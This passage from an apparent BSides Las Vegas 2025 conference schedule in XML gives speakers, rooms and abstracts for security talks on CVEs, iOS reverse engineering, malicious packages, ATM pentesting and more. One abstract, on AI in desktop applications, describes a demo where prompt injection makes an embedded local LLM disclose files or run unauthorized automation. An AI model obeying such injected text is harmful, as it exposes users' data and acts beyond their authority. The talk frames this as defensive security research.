The author would like to acknowledge the financial support of the Survival and Flourishing Fund, Good Forever Foundation, as well as thank the broader flexHEG community for valuable discussion and feedback. 

John Norman of ACCX Research (Fullerton, CA) consulted and handled all of the explosive work, and Evan Miyazono of Atlas Computing provided invaluable project support.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NV9MUC/</url>
            <location>Florentine F</location>
            
            <attendee>Mehmet Sencan</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>FWHWNV@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-FWHWNV</pentabarf:event-slug>
            <pentabarf:title>The Art of Concealment: CVE&#x27;s Challenge with Transparency</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T143000</dtstart>
            <dtend>20250805T145000</dtend>
            <duration>002000</duration>
            <summary>The Art of Concealment: CVE&#x27;s Challenge with Transparency</summary>
            <description>In the cybersecurity world, the Common Vulnerabilities and Exposures (CVE) system serves as a cornerstone for understanding and mitigating security threats. However, the process of contributing to and utilizing CVE data is often hindered by issues related to transparency. This talk explores how the CVE community struggles with openness, examining why participants—such as vulnerability researchers, vendors, and users—may sometimes fall short of full disclosure.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/FWHWNV/</url>
            <location>Florentine F</location>
            
            <attendee>Jerry Gamblin</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>FXMV3G@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-FXMV3G</pentabarf:event-slug>
            <pentabarf:title>So... You want to build your own hacking device...</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T154500</dtend>
            <duration>004500</duration>
            <summary>So... You want to build your own hacking device...</summary>
            <description>In this presentation, I will delve into the burgeoning world of small hacking devices, such as the Flipper Zero and WiFi Nugget, providing a comparative analysis of popular microcontroller boards like the Raspberry Pi Pico, ESP series, and Arduino. This discussion will explore their functionalities, use cases, specifications, and cost considerations, highlighting the broader implications for security practices. We will also examine programming environments including MicroPython, CircuitPython, Arduino IDE, and C, assessing their advantages and limitations for different types of projects.

Further, the session will guide attendees on selecting the right components for their projects, such as WiFi shields, displays, and various sensors, and provide practical advice on assembling these components into functional security tools. The talk aims to empower attendees to enhance their security setups or develop new solutions, providing a roadmap from initial concept to prototype development and eventual production, thereby demystifying the technical complexities and equipping them with the knowledge to effectively utilize these tools in their cyber security endeavors.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/FXMV3G/</url>
            <location>Florentine F</location>
            
            <attendee>Alex Thines</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HVRLVM@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HVRLVM</pentabarf:event-slug>
            <pentabarf:title>Dungeons &amp; Dragons: The security tool you didn’t know you needed</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T174500</dtend>
            <duration>004500</duration>
            <summary>Dungeons &amp; Dragons: The security tool you didn’t know you needed</summary>
            <description># Game-Based Learning for Effective Incident Response Training: Beyond Traditional Tabletops

This talk explores a revolutionary approach to incident response training that leverages role-playing game mechanics to create engaging, effective learning experiences. Traditional tabletop exercises, while common, often fail to prepare teams for real incidents due to their static nature and participants&#x27; reluctance to be fully transparent about organizational vulnerabilities.

The foundation of this approach rests on a simple premise: humans learn better when they&#x27;re having fun. This isn&#x27;t just intuitive wisdom – it&#x27;s backed by scientific research. A meta-study of board, tabletop, and analog game-based learning approaches confirms that engagement and enjoyment significantly enhance knowledge retention and application. When we examine why traditional training methods fall short, we find they often create artificial environments where participants worry about protecting their professional reputation rather than honestly assessing security gaps.

Real incidents rarely unfold according to plan. They happen at inconvenient times (like Friday afternoons), depend on people who might be unavailable, and involve unexpected complications. Our role-playing framework simulates these realities through game mechanics that introduce unpredictability while fostering collaborative problem-solving.

The structure mirrors popular role-playing games like Dungeons &amp; Dragons – a comparison supported by research showing that when such games are played in &quot;inviting, encouraging, compassionate, and intellectually engaged environments,&quot; they create powerful learning opportunities. Each session is guided by an Incident Master who serves as both storyteller and authority on scenario progression.

Participants embody stereotypical characters with defined personality traits and modifiers that affect their interactions. For instance, a Microsoft system administrator might have a bias toward Windows solutions and a negative modifier to likability, while a help desk supporter might have enhanced communication skills. These character archetypes add both humor and realism to the scenarios, encouraging participants to step outside their usual perspectives.

The gameplay follows a three-round structure, typically beginning at the worst possible moment – late Friday afternoon – and progressing through different phases of the incident. Each participant has two actions per round, and outcomes are determined through dice rolls that simulate real-world unpredictability. This mechanic forces teams to develop contingency plans when their initial approaches fail, just as they would in actual incidents.

What sets this approach apart from traditional exercises is the psychological safety it creates. By framing the activity as a game rather than a test or evaluation, participants feel free to experiment with approaches, admit knowledge gaps, and honestly discuss organizational vulnerabilities without fear of professional consequences. This honesty is crucial for effective incident response preparation.

The framework&#x27;s applications extend well beyond security incidents. Organizations can use it to teach abstract security concepts like Identity and Access Management or Zero Trust principles through concrete scenarios. Sales and marketing teams can gain technical understanding by experiencing incidents firsthand. Product teams can demonstrate functionality in realistic contexts. The approach scales from individual to team-based exercises and can be customized to address specific learning objectives.

The open-source nature of this framework makes it accessible to organizations of all sizes. All characters, scenarios, and guidance materials are available on GitHub as markdown files, allowing security teams to implement and customize the approach without significant investment.

From a compliance perspective, this approach offers substantial advantages over traditional methods. Many regulatory frameworks require organizations to conduct regular incident response training. Rather than treating this as a checkbox exercise, the role-playing approach transforms compliance activities into engaging, memorable experiences that produce measurable learning outcomes.

The speaker&#x27;s experience implementing this methodology has revealed several key insights. First, the Incident Master role requires both broad security knowledge and the ability to think dynamically as scenarios unfold in unexpected directions. While previous experience as a Dungeon Master in role-playing games is helpful, it&#x27;s not essential. Second, scenarios should remain open-ended to simulate the unpredictability of actual incidents. Finally, the Incident Master must carefully calibrate difficulty to maintain the optimal learning zone – challenging enough to require creative thinking but not so difficult that participants become frustrated.

This approach recognizes that human minds are not meant to function in isolation. They&#x27;re &quot;plug-and-play devices&quot; designed to operate in networks, and games provide a structured environment for leveraging collective intelligence. By embracing this reality rather than fighting against it, organizations can transform incident response training from a dreaded obligation into an anticipated opportunity for team building and skill development.

In summary, this game-based learning approach represents a paradigm shift in security training methodology. It addresses the fundamental limitations of traditional exercises by creating psychologically safe environments where honest assessment, creative problem-solving, and team collaboration flourish. By making incident response training engaging and enjoyable, organizations not only satisfy compliance requirements but also build genuinely resilient security cultures prepared to face real-world challenges.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HVRLVM/</url>
            <location>Florentine F</location>
            
            <attendee>Klaus Agnoletti</attendee>
            
            <attendee>Glen Sorensen</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JJUSHH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JJUSHH</pentabarf:event-slug>
            <pentabarf:title>Keeping Our History Alive: The Hacker’s Guide to Sticker Preservation</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T180000</dtstart>
            <dtend>20250805T182000</dtend>
            <duration>002000</duration>
            <summary>Keeping Our History Alive: The Hacker’s Guide to Sticker Preservation</summary>
            <description>Hi board! This talk came from a conversation at RE//verse con in February where people admitted using old laptops because they didn&#x27;t want to lose their laptop stickers. Online guides were for sticker removal but not retention. I promised to find some solutions and make it public.

The two sides to this talk are the culture of stickers and the actual how-to of reapplication. They&#x27;ll likely be 50/50 on time for 20 mins. And lots of pictures throughout.

There are many ways to approach the culture side. I want to hit on:
* general interest side (offsec, dfir, networking, etc. &quot;There&#x27;s no place like 127.0.0.1&quot;)
* specific stances (IDA Pro &quot;No undo, no surrender&quot;)
* political statements (&quot;Make Malware Great Again!&quot;)
* the Scene (BSides logos, DEFCON, LUGs, other cons)
* just fun (&quot;Five Eyes: Backdoors and Spies&quot;)


For tech side I&#x27;ve already started buying chemicals and equipment:
* Heat guns
* questionable ways - WD-40, Goo Gone, Acetone
* Still underway - Heptane, VOC compliant Heptane alternatives, Un-Du, drawing gum
* Techniques - How to separate between adhesive and laptop and not between vinyl and adhesive. Dangers of razor blades. Safety third
* Readhesion - How to not lose the glue but if you do how to appropriately add more 


I plan on continuing the research between now and the con. I&#x27;ve done enough work to know the good and bad ways, but now want to explore variations on them.  I&#x27;m trying to find someone to sacrifice a laptop to let me test the limits of burning into the screen.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JJUSHH/</url>
            <location>Florentine F</location>
            
            <attendee>Brian Baskin</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>Z3YUJW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-Z3YUJW</pentabarf:event-slug>
            <pentabarf:title>The Not So Boring Threat Model of CSP-Managed NHI’s</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T183000</dtstart>
            <dtend>20250805T185000</dtend>
            <duration>002000</duration>
            <summary>The Not So Boring Threat Model of CSP-Managed NHI’s</summary>
            <description>This presentation provides a focused examination of a critical risk area across all three major cloud providers: their implementations of CSP-managed Machine Identities. Specifically, we will delve into AWS Service-Linked Roles, Google-managed Service Agents, and Microsoft First-Party Applications.

Drawing upon my extensive experience in Cloud, Cloud Security, and, at its most niche, Cloud Security Identity, this talk will be structured around specific, known vulnerabilities and potential exploitation vectors inherent in each cloud&#x27;s implementation of these CSP-managed identities. This will move beyond theoretical risks to highlight concrete issues.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/Z3YUJW/</url>
            <location>Florentine F</location>
            
            <attendee>Kat Traxler</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ADBAVR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ADBAVR</pentabarf:event-slug>
            <pentabarf:title>Harnessing AI and Post-Quantum Cryptography for Cybersecurity  in the Quantum Era</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T102500</dtend>
            <duration>002500</duration>
            <summary>Harnessing AI and Post-Quantum Cryptography for Cybersecurity  in the Quantum Era</summary>
            <description>Over the past two months, I have focused on researching how Artificial Intelligence (AI) can address the challenges posed by advances in quantum cryptography. As quantum computing evolves, encryption methods and identity tokens face increasing risks, with adversaries potentially breaking encryption much faster. AI provides an efficient solution by enabling quicker detection of attacks and allowing cryptographic systems to adapt in real-time. My research has explored several AI techniques for detecting quantum-related attacks, including Isolation Forest, K-Nearest Neighbors from Scikit-learn, H2O&#x27;s Isolation Forest and Deep Learning models, as well as PyOD and Autoencoder-based Anomaly Detection from TensorFlow. These methods have been evaluated for their effectiveness in identifying data exfiltration and credential theft, which are often early indicators of a &quot;Harvest Now, Decrypt Later&quot; attack.

A &quot;Harvest Now, Decrypt Later&quot; attack involves attackers silently exfiltrating encrypted data now with the intent to decrypt it later when quantum computers can break current cryptographic systems. This attack is characterized by subtle, persistent data exfiltration, often during off-peak hours, and the targeting of highly sensitive data, such as passwords or private keys, without immediate decryption. The absence of immediate fraudulent activity or ransom demands, coupled with the use of weak cryptographic algorithms (e.g., RSA, ECC), can indicate a &quot;Harvest Now, Decrypt Later&quot; attack. To defend against such threats, it is critical to monitor unusual access patterns, transition to quantum-resistant cryptographic systems, and implement advanced strategies like Quantum Key Distribution, Secure Multiparty Computation, and Fully Homomorphic Encryption.

In my session, I will delve into methods for enhancing protection against post-quantum attacks, discussing the implementation of quantum-resistant encryption mechanisms such as Machine Learning-based Key Encapsulation, Machine Learning-based Digital Signature Algorithm, and Symmetric-Lattice-based Hybrid Digital Signature Algorithm. These technologies offer robust solutions to safeguard data from emerging quantum cryptographic risks.

Tools: 
https://scikit-learn.org/stable/modules/neighbors.html
https://docs.h2o.ai/h2o/latest-stable/h2o-docs/data-science/if.html

References:
https://github.com/QNLab-USTC/Key-Management-and-Service-Framework-for-QKD-Networks
https://github.com/h2oai/h2o-tutorials/blob/master/tutorials/isolation-forest/isolation-forest.ipynb

Papers: 
https://cds.cern.ch/record/2723971/files/2005.01598.pdf
https://medium.com/@weidagang/demystifying-anomaly-detection-with-autoencoder-neural-networks-1e235840d879
https://postquantum.com/post-quantum/pqc-quantum-ai-qai/
https://postquantum.com/quantum-ai/quantum-ai-qai/</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ADBAVR/</url>
            <location>Firenze</location>
            
            <attendee>Natalia Semenova</attendee>
            
            <attendee>Anushka Khare</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>CUL8P9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-CUL8P9</pentabarf:event-slug>
            <pentabarf:title>Desktop Applications: Yes, We Still Exist in the Era of AI!!!</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T105500</dtend>
            <duration>002500</duration>
            <summary>Desktop Applications: Yes, We Still Exist in the Era of AI!!!</summary>
            <description>In today’s rush toward AI-native development, desktop applications are often dismissed as legacy systems. However, they remain foundational to industries like design, finance, healthcare, and engineering. These applications are evolving too—embedding local LLMs, enabling predictive UIs, and offering offline AI inference. But in doing so, they create a new category of hybrid software: traditional desktop logic combined with AI decision-making. This evolution introduces a unique and largely under-explored threat landscape.

This talk reframes the AI security conversation around the desktop domain. It starts by cataloging AI use cases already embedded in modern desktop applications—intelligent assistants, context-aware automation, AI-enhanced plugins, and model-influenced file parsing. With this foundation, we’ll explore the novel risks they bring, including:
* Prompt injection in offline or locally-embedded LLMs.
* Inference-based abuse, where untrusted inputs manipulate model behavior.
* Unsafe output handling, where AI-generated content drives downstream actions.
* AI plugin ecosystems prone to over-permissioning or unvalidated extensions.
* Model tampering, especially in scenarios without strong integrity checks.

But these new threats don’t replace the old—they amplify them. Traditional issues such as memory corruption, unsafe file parsing, and protocol vulnerabilities remain present, and in some cases, are re-exposed by AI-powered workflows (e.g., previewing or auto-parsing files without validation).

To demonstrate this hybrid risk model, the session includes two practical demos:
1. A prompt injection attack targeting an embedded local LLM in a desktop app, leading to unintended file disclosure or unauthorized automation.
2. A file-format fuzzing demo against a legacy parser now wrapped in AI functionality, resulting in a crash or memory corruption—highlighting the dangers of blindly coupling AI with legacy input handling.

We’ll then transition into modern threat modeling for these AI-desktop hybrids. We&#x27;ll break down:
* How to model trust boundaries when inference engines are embedded locally.
* Risks introduced by model updates or user-controlled configuration.
* Edge cases like AI-driven plugin behavior and adversarial content generation.

From a defense perspective, we’ll provide fuzzing strategies that remain effective—file format fuzzing, protocol fuzzing, and model I/O fuzzing—along with examples of tools like AFL++, libFuzzer, and custom harnesses for AI pipelines.
Finally, we’ll outline how to bring this into the Secure Development Lifecycle (SDLC):
* Introduce abuse-case testing for AI features.
* Incorporate threat modeling sessions into early feature design.
* Automate fuzzing pipelines into CI for both legacy and AI logic.
* Develop organizational awareness around the risks of hybrid systems.

This session is ideal for security engineers, red teamers, and AppSec practitioners who want a deeper understanding of how the AI transformation impacts a class of software that hasn’t gone anywhere—but is becoming more complex and critical than ever.
Expect actionable insights, demo-driven examples, and a modernized approach to defending desktop applications in the AI era.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/CUL8P9/</url>
            <location>Firenze</location>
            
            <attendee>Uday Bhaskar Seelamantula</attendee>
            
            <attendee>Elizabeth R Rasnick</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DD8DUT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DD8DUT</pentabarf:event-slug>
            <pentabarf:title>Security Theater, Now Playing: When Security Is a Sideshow Instead of a Strategy</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T110000</dtstart>
            <dtend>20250805T112500</dtend>
            <duration>002500</duration>
            <summary>Security Theater, Now Playing: When Security Is a Sideshow Instead of a Strategy</summary>
            <description>Security programs built on frameworks, checklists, and best practices can look great on paper—but without a deep understanding of the product and the business, they often fail to drive real outcomes. At best, they create friction. At worst, they create risk where there was none.

In this talk, I’ll share my journey inheriting a security program at a fast-paced fintech startup that was built entirely through the lens of compliance—without aligning to how the product worked or how the company actually made money. Security was seen as a service function, not a partner. Trust was low, leadership was in flux, and teams carried “security trauma” from past engagements from previous companies.

Through real examples and hard lessons, I’ll walk through how we started turning things around by asking better questions, building fluency in the business, and rethinking what effective security looks like. I’ll cover:

- How misunderstanding the product led us to focus on the wrong risks

- Key questions we started asking product, engineering, and leadership

- Tactical strategies for embedding security into the development lifecycle without slowing teams down

- How we shifted our posture from service provider to strategic enabler

- How AI and automation gave us back time and influence when headcount wasn’t an option

This talk blends storytelling, leadership lessons, and practical takeaways. It&#x27;s designed for anyone trying to build or mature a security program in an environment with limited resources, unclear ownership, or complex dynamics. If you’re tired of playing defense in the dark—or struggling to get buy-in from teams that don’t trust you—this talk will give you a new lens and real strategies for making security work with the business, not just alongside it.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DD8DUT/</url>
            <location>Firenze</location>
            
            <attendee>Vanessa Redman</attendee>
            
            <attendee>Mia Kralowetz</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9EAAT8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9EAAT8</pentabarf:event-slug>
            <pentabarf:title>Shorts Begone: Modding YouTube on iOS (without jailbreaking)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T142500</dtend>
            <duration>002500</duration>
            <summary>Shorts Begone: Modding YouTube on iOS (without jailbreaking)</summary>
            <description>I was wasting far too much time mindlessly scrolling through YouTube Shorts—especially the black hole that is clips from Suits. After watching a few of Bryce Bostwick’s videos on YouTube, I was inspired to take matters into my own hands and figure out how I could rip out all short-form content entirely. After a few days of haxxing, I managed to do just that. This talk is a practical guide I wish I’d had when starting out—an introduction to practical iOS reverse engineering for beginners. What I found was that most online resources on iOS reverse engineering assume you have a jailbroken device you can simply connect to via GDB. That’s what makes this interesting to me—I added the constraint of doing everything on a non-jailbroken device. 

This talk will briefly explore the history of iOS reverse engineering and then move into practical techniques like:

* Dynamic Analysis with Frida: How to hook into iOS apps at runtime, inspect function calls, and modify behaviour on the fly
* Method Swizzling: Overriding Objective-C/Swift methods to change how apps function without modifying binaries
* FLEX – In-app debugging and exploration
* Theos and Tweak Development</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9EAAT8/</url>
            <location>Firenze</location>
            
            <attendee>MasterChen</attendee>
            
            <attendee>Navan</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RU39RL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RU39RL</pentabarf:event-slug>
            <pentabarf:title>Unawakened Wakeup: A Novel PHP Object Injection Technique to Bypass __wakeup()</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T143000</dtstart>
            <dtend>20250805T145500</dtend>
            <duration>002500</duration>
            <summary>Unawakened Wakeup: A Novel PHP Object Injection Technique to Bypass __wakeup()</summary>
            <description>This bypass was conceived about 5 years ago when I tried to hack a Neos Flow application in our business. At the time, I was a novice in POI, but the change of mindset allowed me to build the bypass technique. I am currently out of the field due to a change in my life stage, but I am challenging the CFP to prove that everyone can create opportunities to present their research even if they are out of the field.

This content has been presented at m0leCon this year, a security conference organized by the CTF team &quot;pwnthem0le&quot; and &quot;Politecnico di Torino&quot;, the oldest polytechnic university in Italy. The presentation covered an introduction to PHP Object Injection, explained how POP gadgets are mitigated by overriding `__wakeup()`, and demonstrated how to bypass the mitigation to revive the Guzzle/RCE1 gadget.
It was the first technical presentation for me and some subjects and regrets have remained. So I would like to improve my in-English presentation skill at Proving Ground in Security BSides Las Vegas 2025.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RU39RL/</url>
            <location>Firenze</location>
            
            <attendee>Mat Saulnier</attendee>
            
            <attendee>Hiroki Matsukuma</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>SWPNGK@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-SWPNGK</pentabarf:event-slug>
            <pentabarf:title>Boost Your Career: Get Practical InfoSec Experience in Your Community!</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T152500</dtend>
            <duration>002500</duration>
            <summary>Boost Your Career: Get Practical InfoSec Experience in Your Community!</summary>
            <description>After feeling lost in roles that didn’t fulfill me, I took some time to reflect on how to create change in my life. With a longstanding interest in security and a concern for the lack of knowledge many people have about safe internet browsing, I decided to immerse myself in this field. Fortunately, I discovered a club dedicated to helping low-income students in the community gain internet access, enabling them to compete with their classmates in terms of information and knowledge. From my very first meeting, I knew I had found something that would truly fulfill me. I was later elected President of the club, where I not only assist students but also manage tasks such as loading open-source software on desktops and troubleshooting bugs in our systems. This role has allowed me to streamline our processes while honing my professional skills. During this talk I would like to share my passion for open source and giving back to others in true open source fashion. I am eager to share my experiences and inspire others to seek hands-on opportunities that enable them to develop skills while making a positive impact in their communities. Last year this topic was mentioned at I Am The Cavalry during a talk done by Ira Victor; throughout the rest of the conference we had many people come up and talk to us about how to get more involved. Not only would I have a mentor from Proving Grounds, but I would also have the assistance of an infosec and DFIR expert who was a previous BSides speaker, to also help mentor me with this talk.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/SWPNGK/</url>
            <location>Firenze</location>
            
            <attendee>Mea Clift</attendee>
            
            <attendee>Ashley Cihak</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HZTYYL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HZTYYL</pentabarf:event-slug>
            <pentabarf:title>Let&#x27;s Go Shopping: Third-Party Vendors and CyberRisk</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T153000</dtstart>
            <dtend>20250805T155500</dtend>
            <duration>002500</duration>
            <summary>Let&#x27;s Go Shopping: Third-Party Vendors and CyberRisk</summary>
            <description>We engage in third-party risk management (TPRM) on a weekly, if not daily, basis through various activities such as shopping for clothes, toys, and food. This talk will explore the analogy of a grocery store to better understand how we practice TPRM in our daily lives and how this can serve as a foundation for robust cyber hygiene.

Key terms and concepts that will be visited in this talk are the Criticality of a Vendor, the Inherent Risk of a Vendor, and what considerations may affect these two variables. 

The talk will go through the different aisles of a grocery store to see how we vet our shopping cart:
* Stationery
* Food
* Flowers
* Etc.

The conclusion of this talk will emphasize using our everyday shopping habits as a model for effective TPRM. This approach aims to empower attendees in their role in cybersecurity, highlighting the importance of individual contributions to the overall security framework.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HZTYYL/</url>
            <location>Firenze</location>
            
            <attendee>Meghan Jacquot</attendee>
            
            <attendee>Rafael Ayala</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TRVZRS@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TRVZRS</pentabarf:event-slug>
            <pentabarf:title>Malicious Packages - they&#x27;re gonna get ya!</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T173000</dtstart>
            <dtend>20250805T175500</dtend>
            <duration>002500</duration>
            <summary>Malicious Packages - they&#x27;re gonna get ya!</summary>
            <description>Over the past few years as a developer and then a security engineer, I&#x27;ve been tasked with upgrading packages due to vulnerabilities countless times, and more recently implemented tooling to detect these vulnerabilities. Throughout this work, one subset of vulnerable packages has really stood out to me - malicious packages. They come in many different shapes and sizes. Their risks appear when adding new packages, or when updating existing packages previously thought to be safe. This talk will discuss what malicious packages do, where they come from, the different types, and the risks associated with them. Examples will be provided for each of the various different types. The recent compromise of xz utils will be given as an example of just how far some attackers will go to compromise legitimate packages. If any other particularly noteworthy examples come up within the next few months, those may be discussed as well.

The talk will then discuss different solutions for protecting against these risks. There are many tactics when it comes to new dependencies - reviewing package health, verifying package names, code review / scanning, etc. As well, many companies implement Software Composition Analysis (SCA) tools to detect vulnerable packages. These, however, are insufficient to protect against malicious packages. These tools have an obvious weakness in that they can only catch known malicious packages. They also miss the danger that malicious packages can pose as soon as they&#x27;re run on a developer&#x27;s machine, which is often long before any SCA tool will scan them. Malicious packages can also pose a danger in CI/CD pipelines, particularly if they&#x27;re in testing or build tools (&quot;dev dependencies&quot;), which may run before any SCA tools do (assuming the tool(s) used even scan dev dependencies). Additional protections such as EDR, private package repositories, and package integrity will also be discussed along with their associated weaknesses. In closing, the talk will highlight the need to have multiple layers of defense and remind us that malicious packages are not the only source of supply chain attacks to be vigilant about.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TRVZRS/</url>
            <location>Firenze</location>
            
            <attendee>Allan Friedman</attendee>
            
            <attendee>Megg Sage</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>Z3RMSJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-Z3RMSJ</pentabarf:event-slug>
            <pentabarf:title>Take all my money – penetrating ATMs</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T180000</dtstart>
            <dtend>20250805T182500</dtend>
            <duration>002500</duration>
            <summary>Take all my money – penetrating ATMs</summary>
            <description>In this presentation we will discuss real-world examples of cybersecurity issues with ATMs. Ever wondered what it takes to make an ATM spew out cash? You’ll hear some war stories from Fredrik&#x27;s career of penetration testing ATMs, which include the technical aspects of ATM hacking, like tools, but also troubles that can arise when trying to set up an ATM test.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/Z3RMSJ/</url>
            <location>Firenze</location>
            
            <attendee>Jonathan Fischer</attendee>
            
            <attendee>Fredrik Sandström</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>X7ERWF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-X7ERWF</pentabarf:event-slug>
            <pentabarf:title>Broke but Breached: Secret Scanning at Scale on a Student Budget</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T183000</dtstart>
            <dtend>20250805T185500</dtend>
            <duration>002500</duration>
